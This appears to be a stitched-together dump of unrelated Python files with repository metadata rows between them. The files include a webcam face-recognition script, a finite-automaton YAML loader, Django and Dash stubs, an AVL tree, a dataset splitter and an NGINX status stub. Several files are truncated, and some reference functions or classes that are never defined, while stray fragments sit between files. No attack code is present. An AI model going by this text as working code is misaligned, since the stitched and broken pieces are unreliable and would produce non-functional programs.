# OpeningHours parsing imported above -- confirm against the spider body).
Days = ["Su", "Mo", "Tu", "We", "Th", "Fr", "Sa"]
| 33.26087 | 83 | 0.547277 |
54c063aa9c40b1e765ddd298550866419dd317e0 | 4,614 | py | Python | faces/recognize_faces_video.py | rummens1337/vision-assignment | 8735e95224be702f1bb33066eef80f098b347b1f | [
"MIT"
] | null | null | null | faces/recognize_faces_video.py | rummens1337/vision-assignment | 8735e95224be702f1bb33066eef80f098b347b1f | [
"MIT"
] | null | null | null | faces/recognize_faces_video.py | rummens1337/vision-assignment | 8735e95224be702f1bb33066eef80f098b347b1f | [
"MIT"
] | 1 | 2020-01-06T09:55:35.000Z | 2020-01-06T09:55:35.000Z | # import the necessary packages
from imutils.video import VideoStream
import face_recognition
import imutils
import pickle
import time
import cv2
import os
# https://www.pyimagesearch.com/2018/06/18/face-recognition-with-opencv-python-and-deep-learning/
# https://www.pyimagesearch.com/2018/06/11/how-to-build-a-custom-face-recognition-dataset/
# Script configuration (kept as a dict mirroring the original argparse-style
# interface of the pyimagesearch tutorial this is based on).
args = {}
# path to serialized db of facial encodings
args['encodings'] = os.path.join(os.path.dirname(__file__), 'encodings.pickle')
# path to output video
args['output'] = None
# whether or not to display output frame to screen
args['display'] = 1
# face detection model to use: either `hog` or `cnn`
args['detection_method'] = 'hog'
# load the known faces and embeddings
print("[INFO] loading encodings...")
data = pickle.loads(open(args["encodings"], "rb").read())
# initialize the video stream and pointer to output video file, then
# allow the camera sensor to warm up
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
writer = None
time.sleep(2.0)
# loop over frames from the video file stream
while True:
    # grab the frame from the threaded video stream
    frame = vs.read()
    # convert the input frame from BGR to RGB then resize it to have
    # a width of 750px (to speedup processing)
    rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    # BUGFIX: resize the converted RGB image rather than the original BGR
    # frame; the previous code resized `frame`, discarding the color
    # conversion and feeding BGR data to face_recognition (which expects RGB).
    rgb = imutils.resize(rgb, width=750)
    r = frame.shape[1] / float(rgb.shape[1])
    # detect the (x, y)-coordinates of the bounding boxes
    # corresponding to each face in the input frame, then compute
    # the facial embeddings for each face
    boxes = face_recognition.face_locations(rgb,
                                            model=args["detection_method"])
    encodings = face_recognition.face_encodings(rgb, boxes)
    names = []
    # loop over the facial embeddings
    for encoding in encodings:
        # attempt to match each face in the input image to our known
        # encodings
        matches = face_recognition.compare_faces(data["encodings"],
                                                 encoding)
        name = "Unknown"
        # check to see if we have found a match
        if True in matches:
            # find the indexes of all matched faces then initialize a
            # dictionary to count the total number of times each face
            # was matched
            matchedIdxs = [i for (i, b) in enumerate(matches) if b]
            counts = {}
            # loop over the matched indexes and maintain a count for
            # each recognized face face
            for i in matchedIdxs:
                name = data["names"][i]
                counts[name] = counts.get(name, 0) + 1
            # determine the recognized face with the largest number
            # of votes (note: in the event of an unlikely tie Python
            # will select first entry in the dictionary)
            name = max(counts, key=counts.get)
        # update the list of names
        names.append(name)
    # loop over the recognized faces
    for ((top, right, bottom, left), name) in zip(boxes, names):
        # rescale the face coordinates (boxes were found on the resized
        # image; r maps them back to the full-resolution frame)
        top = int(top * r)
        right = int(right * r)
        bottom = int(bottom * r)
        left = int(left * r)
        # draw the predicted face name on the image
        cv2.rectangle(frame, (left, top), (right, bottom),
                      (0, 255, 0), 2)
        y = top - 15 if top - 15 > 15 else top + 15
        cv2.putText(frame, name, (left, y), cv2.FONT_HERSHEY_SIMPLEX,
                    0.75, (0, 255, 0), 2)
    # if the video writer is None *AND* we are supposed to write
    # the output video to disk initialize the writer
    # if writer is None and args["output"] is not None:
    #     fourcc = cv2.VideoWriter_fourcc(*"MJPG")
    #     writer = cv2.VideoWriter(args["output"], fourcc, 20,
    #                              (frame.shape[1], frame.shape[0]), True)
    #
    # # if the writer is not None, write the frame with recognized
    # # faces to disk
    # if writer is not None:
    #     writer.write(frame)
    # check to see if we are supposed to display the output frame to
    # the screen
    if args["display"] > 0:
        cv2.imshow("Frame", frame)
        key = cv2.waitKey(1) & 0xFF
        # if the `q` key was pressed, break from the loop
        if key == ord("q"):
            break
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
# check to see if the video writer point needs to be released
if writer is not None:
    writer.release()
| 36.912 | 97 | 0.6114 |
54c067d1a064f439200439939a3af3a79e1fca5f | 3,298 | py | Python | pytint/machine_io.py | semicolonTransistor/PyTint | 0f70fe756c285cda38b3a91318af02382a505263 | [
"MIT"
] | 1 | 2020-08-14T19:41:45.000Z | 2020-08-14T19:41:45.000Z | pytint/machine_io.py | semicolonTransistor/PyTint | 0f70fe756c285cda38b3a91318af02382a505263 | [
"MIT"
] | null | null | null | pytint/machine_io.py | semicolonTransistor/PyTint | 0f70fe756c285cda38b3a91318af02382a505263 | [
"MIT"
] | null | null | null | from pytint.interpreters import FiniteAutomaton
from typing import List, Union, Dict, Iterable
import collections
import yaml
def _as_str_list(value):
    """Wrap a scalar into a one-element list, then stringify every element.

    Strings count as scalars here even though they are iterable.
    """
    # Uses the runtime-checkable typing.Iterable imported at the top of the
    # file instead of collections.Iterable, which was removed in Python 3.10.
    if isinstance(value, str) or not isinstance(value, Iterable):
        value = [value]
    return [str(item) for item in value]


def load_machine(yaml_input: str, machine_type: str = "", name: str = ""):
    """Build a machine from its YAML description.

    :param yaml_input: YAML text describing the machine
    :param machine_type: optional override for the machine type; when empty,
        the ``type`` field of the YAML document is used
    :param name: optional override for the machine name
    :return: the constructed machine (currently only finite automata:
        ``dfa`` and ``nfa``)
    :raises IncompleteMachine: when a required field is missing
    :raises UnsupportedMachine: when the machine type is not supported
    """
    # loads yaml from input
    data = yaml.safe_load(yaml_input)
    # Resolve the machine type: an explicit argument wins over the YAML field.
    if not machine_type:
        if "type" in data:
            machine_type = str(data["type"])
        else:
            # can't find machine type
            raise IncompleteMachine("type", "machine")
    # Normalize so overrides such as "DFA" match too (previously only the
    # YAML-supplied type was lower-cased).
    machine_type = machine_type.lower()
    if not name and "name" in data:
        name = data["name"]
    if "start" in data:
        start = str(data["start"])
    else:
        raise IncompleteMachine("start", machine_type)
    if machine_type not in ("dfa", "nfa"):
        raise UnsupportedMachine("{} is not a supported machine type!".format(machine_type))
    machine = FiniteAutomaton(name)
    machine.set_start_state(start)
    if "accept-states" not in data:
        raise IncompleteMachine("accept-states", machine_type)
    for accept_state in _as_str_list(data["accept-states"]):
        machine.add_accepting_state(accept_state)
    if "transitions" not in data:
        raise IncompleteMachine("transitions", machine_type)
    for transition in data["transitions"]:
        if len(transition) < 3:
            raise Exception("Transitions are 3-tuples!")
        state = str(transition[0])
        # BUGFIX: the symbol entry was previously passed through str() before
        # the scalar/iterable handling, which turned a YAML list of symbols
        # into a single bogus symbol like "['a', 'b']" (and made the
        # subsequent iterable handling dead code). Treat it like the other
        # entries instead.
        symbols = _as_str_list(transition[1])
        next_states = _as_str_list(transition[2])
        for symbol in symbols:
            # The empty string represents an epsilon transition; the word
            # "epsilon" (any case) is accepted as an alias for it.
            if symbol.lower() == "epsilon":
                symbol = ""
            for next_state in next_states:
                machine.add_transition(state, symbol, next_state)
    return machine
def load_machine_from_file(path: str, machine_type: str = "", name: str = ""):
    """Read the YAML machine description stored at *path* and load it.

    Thin wrapper around ``load_machine``; the optional *machine_type* and
    *name* overrides are forwarded unchanged.
    """
    with open(path, "r") as machine_file:
        yaml_text = machine_file.read()
    return load_machine(yaml_text, machine_type, name)
| 36.644444 | 109 | 0.608854 |
54c1abcc8ecb4f60275606b22bbb22422b5b3be6 | 1,021 | py | Python | dashboard/frontend/callbacks.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | 1 | 2022-03-06T23:50:34.000Z | 2022-03-06T23:50:34.000Z | dashboard/frontend/callbacks.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | 4 | 2022-03-03T11:16:17.000Z | 2022-03-20T15:53:37.000Z | dashboard/frontend/callbacks.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | null | null | null | import dash
from dash.dependencies import Input, Output # type: ignore
import datetime
from treemap import generate_treemap, get_plot_data
from app import app
from store import store
| 31.90625 | 70 | 0.663075 |
54c3ac280575bb0ee6051627754ebf1784317751 | 4,095 | py | Python | tms/useraccount/views.py | csagar131/TicketManagementSystem | d2c6b340dcb1d7607257d88dc5b931a0624a774b | [
"Apache-2.0"
] | null | null | null | tms/useraccount/views.py | csagar131/TicketManagementSystem | d2c6b340dcb1d7607257d88dc5b931a0624a774b | [
"Apache-2.0"
] | 4 | 2021-06-04T23:51:17.000Z | 2022-02-10T10:41:21.000Z | tms/useraccount/views.py | csagar131/TicketManagementSystem | d2c6b340dcb1d7607257d88dc5b931a0624a774b | [
"Apache-2.0"
] | 1 | 2020-06-04T11:44:42.000Z | 2020-06-04T11:44:42.000Z | from django.shortcuts import render
from rest_framework.viewsets import ModelViewSet
from useraccount.serializer import UserSerializer,AgentUserSerializer
from rest_framework.views import APIView
from useraccount.models import User
from django.http.response import JsonResponse
from django.template.loader import render_to_string
from django.core.mail import send_mail
from rest_framework.authtoken.models import Token
from rest_framework.authentication import TokenAuthentication
from ticket.models import Organization
import random
import array
| 36.238938 | 114 | 0.60464 |
54c4b203b6a2600da692213b5eb8857816d71318 | 2,203 | py | Python | ppocr/utils/special_character.py | ZacksTsang/PaddleOCR | c716553f6f369d191b91690a81936a19173a7c33 | [
"Apache-2.0"
] | 1 | 2021-08-12T17:16:02.000Z | 2021-08-12T17:16:02.000Z | ppocr/utils/special_character.py | ZacksTsang/PaddleOCR | c716553f6f369d191b91690a81936a19173a7c33 | [
"Apache-2.0"
] | null | null | null | ppocr/utils/special_character.py | ZacksTsang/PaddleOCR | c716553f6f369d191b91690a81936a19173a7c33 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
if __name__ == "__main__":
sp = SpecialCharacter({'special_character_dict_path': './special_character_dict.txt'})
print(sp.normalText('01'.decode('utf-8'))) | 43.196078 | 213 | 0.576033 |
54c4dc3efeaaf5e89758e47b3cc255b10a88682a | 1,160 | py | Python | setup.py | ionata/django-unique-uploadto | da66ed30d6abd86566d9b141e3c48b10340740a2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | ionata/django-unique-uploadto | da66ed30d6abd86566d9b141e3c48b10340740a2 | [
"BSD-3-Clause"
] | 1 | 2017-11-21T22:11:24.000Z | 2017-11-22T00:38:17.000Z | setup.py | ionata/django-unique-uploadto | da66ed30d6abd86566d9b141e3c48b10340740a2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from __future__ import absolute_import, print_function, unicode_literals
from setuptools import setup, find_packages
from unique_uploadto import __version__
with open('README.rst', 'r') as f:
readme = f.read()
setup(
name='django-unique-uploadto',
version=__version__,
description='Use a unique filename for django uploads',
long_description=readme,
author='Ionata Digital',
author_email='webmaster@ionata.com.au',
url='https://github.com/ionata/django-unique-uploadto',
license='BSD',
packages=find_packages(),
install_requires=[
'django>=1.8.0',
],
package_data={},
include_package_data=True,
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Framework :: Django',
],
)
| 27.619048 | 72 | 0.64569 |
54c84616a029f134346dc45645dd043f6f816a04 | 793 | py | Python | scripts/python/helper/decoration.py | sulthonzh/zaruba | ec9262f43da17d86330da2c593b7da451aabd60f | [
"Apache-2.0"
] | null | null | null | scripts/python/helper/decoration.py | sulthonzh/zaruba | ec9262f43da17d86330da2c593b7da451aabd60f | [
"Apache-2.0"
] | null | null | null | scripts/python/helper/decoration.py | sulthonzh/zaruba | ec9262f43da17d86330da2c593b7da451aabd60f | [
"Apache-2.0"
] | null | null | null | import random
normal="\033[0m"
bold="\033[1m"
faint="\033[2m"
italic="\033[3m"
underline="\033[4m"
blinkSlow="\033[5m"
blinkRapid="\033[6m"
inverse="\033[7m"
conceal="\033[8m"
crossedOut="\033[9m"
black="\033[30m"
red="\033[31m"
green="\033[32m"
yellow="\033[33m"
blue="\033[34m"
magenta="\033[35m"
cyan="\033[36m"
white="\033[37m"
bgBlack="\033[40m"
bgRed="\033[41m"
bgGreen="\033[42m"
bgYellow="\033[43m"
bgBlue="\033[44m"
bgMagenta="\033[45m"
bgCyan="\033[46m"
bgWhite="\033[47m"
noStyle="\033[0m"
noUnderline="\033[24m"
noInverse="\033[27m"
noColor="\033[39m"
| 20.333333 | 121 | 0.583859 |
49a498a0dfc278640dff975e47a36448f00bf3bc | 2,918 | py | Python | data_structures/tree/avl_tree.py | hongta/practice-python | 52d5278ea5402ea77054bfa5c4bfdbdf81c9c963 | [
"MIT"
] | null | null | null | data_structures/tree/avl_tree.py | hongta/practice-python | 52d5278ea5402ea77054bfa5c4bfdbdf81c9c963 | [
"MIT"
] | null | null | null | data_structures/tree/avl_tree.py | hongta/practice-python | 52d5278ea5402ea77054bfa5c4bfdbdf81c9c963 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from tree_node import AVLTreeNode
from binary_search_tree import BinarySearchTree
if __name__ == '__main__':
t = AVLTree()
t.insert(10)
t.insert(15)
t.insert(20)
t.insert(25)
t.insert(30)
p = t.search(20)
print p, p.left, p.right, p.height, p.parent
p = t.search(15)
print p, p.left, p.right, p.height, p.parent
p = t.search(25)
print p, p.left, p.right, p.height, p.parent
| 26.770642 | 78 | 0.59013 |
49a4e7b419d4d64776cdbda3fd3b82f70e450c6d | 96 | py | Python | ardget_app/apps.py | shumdeveloper/ardget | 585a93ce24e747014f2cbde8daae600e26fbd835 | [
"MIT"
] | null | null | null | ardget_app/apps.py | shumdeveloper/ardget | 585a93ce24e747014f2cbde8daae600e26fbd835 | [
"MIT"
] | null | null | null | ardget_app/apps.py | shumdeveloper/ardget | 585a93ce24e747014f2cbde8daae600e26fbd835 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 16 | 35 | 0.770833 |
49a74574e4d388966ade396ad88447197a6c63e8 | 1,944 | py | Python | dynamic_rest/datastructures.py | reinert/dynamic-rest | aaf3973f69b53ed317b9c8468942523715814fa8 | [
"MIT"
] | 690 | 2016-02-05T22:46:03.000Z | 2022-03-28T18:59:49.000Z | dynamic_rest/datastructures.py | reinert/dynamic-rest | aaf3973f69b53ed317b9c8468942523715814fa8 | [
"MIT"
] | 190 | 2015-03-06T16:57:21.000Z | 2022-02-02T21:56:07.000Z | dynamic_rest/datastructures.py | reinert/dynamic-rest | aaf3973f69b53ed317b9c8468942523715814fa8 | [
"MIT"
] | 117 | 2016-05-05T13:51:07.000Z | 2022-02-28T18:25:56.000Z | """This module contains custom data-structures."""
import six
| 29.907692 | 77 | 0.513374 |
49a7ee42b8f9f516686c7f73c30cfb6480597ce8 | 2,605 | py | Python | functions.py | heEXDe/password_generator | c546c09be927abc2a02971cab5f2d19817208cda | [
"MIT"
] | null | null | null | functions.py | heEXDe/password_generator | c546c09be927abc2a02971cab5f2d19817208cda | [
"MIT"
] | null | null | null | functions.py | heEXDe/password_generator | c546c09be927abc2a02971cab5f2d19817208cda | [
"MIT"
] | null | null | null | # functions for actions
import random
import string
import GUI
| 42.016129 | 103 | 0.571209 |
49a800c2275f46ea1981d8aa809ee37691f78025 | 1,330 | py | Python | lottery/branch/retrain.py | chenw23/open_lth | 2ce732fe48abd5a80c10a153c45d397b048e980c | [
"MIT"
] | 509 | 2020-05-07T16:45:46.000Z | 2022-03-28T13:41:36.000Z | lottery/branch/retrain.py | chenw23/open_lth | 2ce732fe48abd5a80c10a153c45d397b048e980c | [
"MIT"
] | 12 | 2020-06-10T10:07:09.000Z | 2022-02-03T01:57:32.000Z | lottery/branch/retrain.py | chenw23/open_lth | 2ce732fe48abd5a80c10a153c45d397b048e980c | [
"MIT"
] | 103 | 2020-05-07T21:40:06.000Z | 2022-03-11T19:07:55.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import datasets.registry
from foundations import hparams
from foundations.step import Step
from lottery.branch import base
import models.registry
from pruning.mask import Mask
from pruning.pruned_model import PrunedModel
from training import train
| 35.945946 | 118 | 0.72406 |
49a855768d0faa6b5929b201dd9c0e69c1e8d0cf | 1,860 | py | Python | Sumo_programs/probablyGoodCode/Lyall's_Test_File.py | senornosketchy/ENGG1000-R2R | 5c6880e81560079d22c8dbbadd9c7fdd1e585aa4 | [
"MIT"
] | null | null | null | Sumo_programs/probablyGoodCode/Lyall's_Test_File.py | senornosketchy/ENGG1000-R2R | 5c6880e81560079d22c8dbbadd9c7fdd1e585aa4 | [
"MIT"
] | null | null | null | Sumo_programs/probablyGoodCode/Lyall's_Test_File.py | senornosketchy/ENGG1000-R2R | 5c6880e81560079d22c8dbbadd9c7fdd1e585aa4 | [
"MIT"
] | null | null | null | """
Created on Thu Mar 22 15:07:43 2018
@author: Tanvee
First attempt at an program for the EV3 bot.
The main aim of this is to develop an algorithm to search clockwise for and identify
close objects, before rushing to meet them.
"""
print(0)
from time import sleep
import sys, os
# Import the ev3dev specific library
from ev3dev.ev3 import *
print(1)
# Connect motors
rightMotor = LargeMotor(OUTPUT_C)
assert rightMotor.connected
leftMotor = LargeMotor(OUTPUT_B)
assert leftMotor.connected
# Connect sensors
print(2)
tsRIGHT = TouchSensor(INPUT_3)
assert tsRIGHT.connected
tsLEFT = TouchSensor(INPUT_2)
assert tsLEFT.connected
us = UltrasonicSensor()
assert us.connected
cs = ColorSensor(INPUT_4)
assert cs.connected
print("All Connected")
# The gyro is reset when the mode is changed, so the first line is extra, just so we
# can change the mode the 'GYRO-ANGLE', which is what we want
# gs.mode = 'GYRO-RATE' # Changing the mode resets the gyro
# gs.mode = 'GYRO-ANG' # Set gyro mode to return compass angle
# We will need to check EV3 buttons state.
btn = Button()
# FUNCTION DEFINITIONS
def drive(left, right):
    """
    Start both motors at the given speeds.

    :param left: duty cycle for the left motor (presumably a percentage
        where negative values reverse -- TODO confirm against ev3dev docs).
    :param right: duty cycle for the right motor (same convention).
    """
    # run_direct applies the duty cycle immediately; the motors keep
    # running until another command changes or stops them.
    leftMotor.run_direct(duty_cycle_sp=left)
    rightMotor.run_direct(duty_cycle_sp=right)
"""
The default action is to spin around in an attempt to detect any object
within a certain radius using the ultrasonic sensor.
If the ultrasonic detects anything within 500mm the robot's reacts by "charging" at the object
"""
while True:
main()
| 21.882353 | 98 | 0.716667 |
49a87d079120bfbcccec5530adc7e03acb1cb9a1 | 13,984 | py | Python | tests/test_modelgen.py | PipGrylls/sqlalchemy-modelgen | 988e7b39fa4f8b2ddac35792c21e147e8260df17 | [
"MIT"
] | 18 | 2021-04-01T20:32:42.000Z | 2021-06-01T05:24:27.000Z | tests/test_modelgen.py | PipGrylls/sqlalchemy-modelgen | 988e7b39fa4f8b2ddac35792c21e147e8260df17 | [
"MIT"
] | null | null | null | tests/test_modelgen.py | PipGrylls/sqlalchemy-modelgen | 988e7b39fa4f8b2ddac35792c21e147e8260df17 | [
"MIT"
] | 1 | 2021-11-23T01:17:18.000Z | 2021-11-23T01:17:18.000Z | from unittest import TestCase, mock
from modelgen import ModelGenerator, Base
from os import getcwd, path | 44.820513 | 101 | 0.661971 |
49a8f69931a09da4e91b5822491e86963189f463 | 223 | py | Python | papermerge/apps/e_invoice/apps.py | francescocarzaniga/e_invoice_papermerge | e7a4a3fdab4263c02983b638f873db8d11e89041 | [
"Apache-2.0"
] | 1 | 2021-02-15T06:38:32.000Z | 2021-02-15T06:38:32.000Z | papermerge/apps/e_invoice/apps.py | francescocarzaniga/e_invoice_papermerge | e7a4a3fdab4263c02983b638f873db8d11e89041 | [
"Apache-2.0"
] | null | null | null | papermerge/apps/e_invoice/apps.py | francescocarzaniga/e_invoice_papermerge | e7a4a3fdab4263c02983b638f873db8d11e89041 | [
"Apache-2.0"
] | 1 | 2021-02-15T06:38:35.000Z | 2021-02-15T06:38:35.000Z | from django.apps import AppConfig
# def ready(self):
# from papermerge.apps.data_retention import signals # noqa
| 22.3 | 67 | 0.713004 |
49a92b917ad9d386c28bdce310accefac0f211c6 | 2,075 | py | Python | handler_loud/chat.py | ross/simone | cfee8eaa04a7ddd235f735fa6c07adac28b4c6a4 | [
"MIT"
] | null | null | null | handler_loud/chat.py | ross/simone | cfee8eaa04a7ddd235f735fa6c07adac28b4c6a4 | [
"MIT"
] | 1 | 2021-11-04T13:47:28.000Z | 2021-11-04T13:47:28.000Z | handler_loud/chat.py | ross/simone | cfee8eaa04a7ddd235f735fa6c07adac28b4c6a4 | [
"MIT"
] | 1 | 2021-10-20T14:44:19.000Z | 2021-10-20T14:44:19.000Z | from logging import getLogger
from random import randrange
import re
from simone.handlers import Registry, exclude_private
from .models import Shout
# Based loosely on https://github.com/desert-planet/hayt/blob/master/scripts/loud.coffee
Registry.register_handler(Loud())
| 33.467742 | 88 | 0.578313 |
49a9a3178fb4042aad889e7fe746a420d38ecae5 | 1,013 | py | Python | Algo and DSA/LeetCode-Solutions-master/Python/web-crawler.py | Sourav692/FAANG-Interview-Preparation | f523e5c94d582328b3edc449ea16ac6ab28cdc81 | [
"Unlicense"
] | 3,269 | 2018-10-12T01:29:40.000Z | 2022-03-31T17:58:41.000Z | Algo and DSA/LeetCode-Solutions-master/Python/web-crawler.py | Sourav692/FAANG-Interview-Preparation | f523e5c94d582328b3edc449ea16ac6ab28cdc81 | [
"Unlicense"
] | 53 | 2018-12-16T22:54:20.000Z | 2022-02-25T08:31:20.000Z | Algo and DSA/LeetCode-Solutions-master/Python/web-crawler.py | Sourav692/FAANG-Interview-Preparation | f523e5c94d582328b3edc449ea16ac6ab28cdc81 | [
"Unlicense"
] | 1,236 | 2018-10-12T02:51:40.000Z | 2022-03-30T13:30:37.000Z | # Time: O(|V| + |E|)
# Space: O(|V|)
# """
# This is HtmlParser's API interface.
# You should not implement it, or speculate about its implementation
# """
| 25.325 | 69 | 0.515301 |
49aa6dbb7d625a529dc7cc00fc711016b4a758db | 3,614 | py | Python | scripts/collect.py | oveis/DeepVideoFaceSwap | e507f94d4f5d74c36e41c386c6fb14bb745a4885 | [
"MIT"
] | 5 | 2019-05-17T11:54:04.000Z | 2020-10-06T18:45:17.000Z | scripts/collect.py | oveis/DeepVideoFaceSwap | e507f94d4f5d74c36e41c386c6fb14bb745a4885 | [
"MIT"
] | null | null | null | scripts/collect.py | oveis/DeepVideoFaceSwap | e507f94d4f5d74c36e41c386c6fb14bb745a4885 | [
"MIT"
] | 5 | 2019-06-05T00:20:24.000Z | 2019-09-15T15:40:23.000Z | #!/usr/bin python3
""" The script to collect training data """
import logging
import os
import cv2 as cv
import numpy as np
from google_images_download import google_images_download as gid
from lib.utils import get_folder
from os.path import exists, isfile, join
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
FRONT_FACE_CASCADE = cv.CascadeClassifier('scripts/haarcascades/haarcascade_frontalface_default.xml')
PROFILE_FACE_CASCADE = cv.CascadeClassifier('scripts/haarcascades/haarcascade_profileface.xml')
# TODO: Need a function to put images in S3 bucket.
# TODO: Retrieve face images from a given video file. | 36.505051 | 104 | 0.649972 |
49aacdd586494ba24976083e9c7c711f99d594ea | 1,132 | py | Python | data_split.py | TalSchuster/FewRel | af68f52b13977ca29808c38a54995363f76cdcad | [
"MIT"
] | null | null | null | data_split.py | TalSchuster/FewRel | af68f52b13977ca29808c38a54995363f76cdcad | [
"MIT"
] | null | null | null | data_split.py | TalSchuster/FewRel | af68f52b13977ca29808c38a54995363f76cdcad | [
"MIT"
] | null | null | null | import os
import random
from shutil import copyfile
import json
random.seed(123)
ROOT_PATH = './data/'
k = 5
target_path = './data/wiki_5_splits/'
'''
Splits the training set to 5 folds.
In each split, the held out set is used for test.
'''
path = os.path.join(ROOT_PATH, 'train_wiki' + '.json')
data = json.load(open(path, 'r'))
relations = list(data.keys())
num_relations = len(relations)
rels_per_split = round(num_relations / k)
random.shuffle(relations)
for i in range(k):
split_val_rels = relations[i*rels_per_split: (i+1)*rels_per_split]
split_train = {}
split_val = {}
for rel, examples in data.items():
if rel in split_val_rels:
split_val[rel] = examples
else:
split_train[rel] = examples
print(f"split {i}: train: {len(split_val.keys())}, test: {len(split_train.keys())}")
os.makedirs(os.path.join(target_path, str(i)), exist_ok=True)
with open(os.path.join(target_path, str(i), 'train.json'), 'w') as f:
json.dump(split_train, f)
with open(os.path.join(target_path, str(i), 'val.json'), 'w') as f:
json.dump(split_val, f)
| 25.155556 | 88 | 0.655477 |
49aaf3536a9b3013f2535a7951571b5299a8099f | 604 | py | Python | heisen/core/__init__.py | HeisenCore/heisen | 0cd4d27822960553a8e83a72c7dfeefa76e65c06 | [
"MIT"
] | 5 | 2016-08-30T07:51:08.000Z | 2021-09-13T11:30:05.000Z | heisen/core/__init__.py | HeisenCore/heisen | 0cd4d27822960553a8e83a72c7dfeefa76e65c06 | [
"MIT"
] | 15 | 2016-09-15T19:21:24.000Z | 2016-10-22T16:22:15.000Z | heisen/core/__init__.py | HeisenCore/heisen | 0cd4d27822960553a8e83a72c7dfeefa76e65c06 | [
"MIT"
] | null | null | null | from heisen.config import settings
from jsonrpclib.request import ConnectionPool
rpc_call = get_rpc_connection()
| 27.454545 | 80 | 0.692053 |
49abd960ef01b21e1a602cfce947ec5f7f32f14e | 3,182 | py | Python | pychron/processing/analysis_graph.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
] | null | null | null | pychron/processing/analysis_graph.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
] | 20 | 2020-09-09T20:58:39.000Z | 2021-10-05T17:48:37.000Z | pychron/processing/analysis_graph.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
] | null | null | null | # ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import Event
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.graph.graph import Graph
from pychron.graph.stacked_graph import StackedGraph
from pychron.graph.stacked_regression_graph import StackedRegressionGraph
# ============= EOF =============================================
| 33.851064 | 100 | 0.653363 |
49ac5028ee971f3e584f2c491889fc4e4b16901b | 3,023 | py | Python | stub/nginx-status-stub.py | geld-tech/nginx-monitor-dashboard | 3fcd3bd184a0348095c4f4ec91a46ab98ee0ca80 | [
"Apache-2.0"
] | 1 | 2018-07-30T14:01:36.000Z | 2018-07-30T14:01:36.000Z | stub/nginx-status-stub.py | geld-tech/nginx-monitor-dashboard | 3fcd3bd184a0348095c4f4ec91a46ab98ee0ca80 | [
"Apache-2.0"
] | null | null | null | stub/nginx-status-stub.py | geld-tech/nginx-monitor-dashboard | 3fcd3bd184a0348095c4f4ec91a46ab98ee0ca80 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
NGINX Status Stub
Returns sample resources usage
"""
import logging
import logging.handlers
import random
from optparse import OptionParser
from flask import Flask
app = Flask(__name__)
app.debug = True
# Initialisation
logging.basicConfig(format='[%(asctime)-15s] [%(threadName)s] %(levelname)s %(message)s', level=logging.INFO)
logger = logging.getLogger('root')
if __name__ == "__main__":
# Parse options
opts_parser = OptionParser()
opts_parser.add_option('--port', type="int", dest='port', help='IP Port to listen to.', default=8000)
opts_parser.add_option('--debug', action='store_true', dest='debug', help='Print verbose output.', default=False)
options, args = opts_parser.parse_args()
if options.debug:
logger.setLevel(logging.DEBUG)
logger.debug('Enabled DEBUG logging level.')
logger.info('Options parsed')
app.run(host='0.0.0.0', port=options.port)
| 50.383333 | 1,124 | 0.700629 |
49ad0529acc7b30e818083fbddf61cedb7ec9149 | 1,616 | py | Python | test_question4.py | fmakawa/Practice | 7f6eaa1dde4e46088ca5dcee76de1bb56a363238 | [
"MIT"
] | null | null | null | test_question4.py | fmakawa/Practice | 7f6eaa1dde4e46088ca5dcee76de1bb56a363238 | [
"MIT"
] | null | null | null | test_question4.py | fmakawa/Practice | 7f6eaa1dde4e46088ca5dcee76de1bb56a363238 | [
"MIT"
] | null | null | null | """
Question 4
Level 1
Question:
Write a program which accepts a sequence of comma-separated numbers from console and generate a list and a tuple which contains every number.
Suppose the following input is supplied to the program:
34,67,55,33,12,98
Then, the output should be:
['34', '67', '55', '33', '12', '98']
('34', '67', '55', '33', '12', '98')
Hints:
In case of input data being supplied to the question, it should be assumed to be a console input.
tuple() method can convert list to tuple
"""
import unittest
from unittest.mock import patch
from question4 import listicle, tuplicle, listpicle
suite = unittest.TestLoader().loadTestsFromTestCase(TestDict)
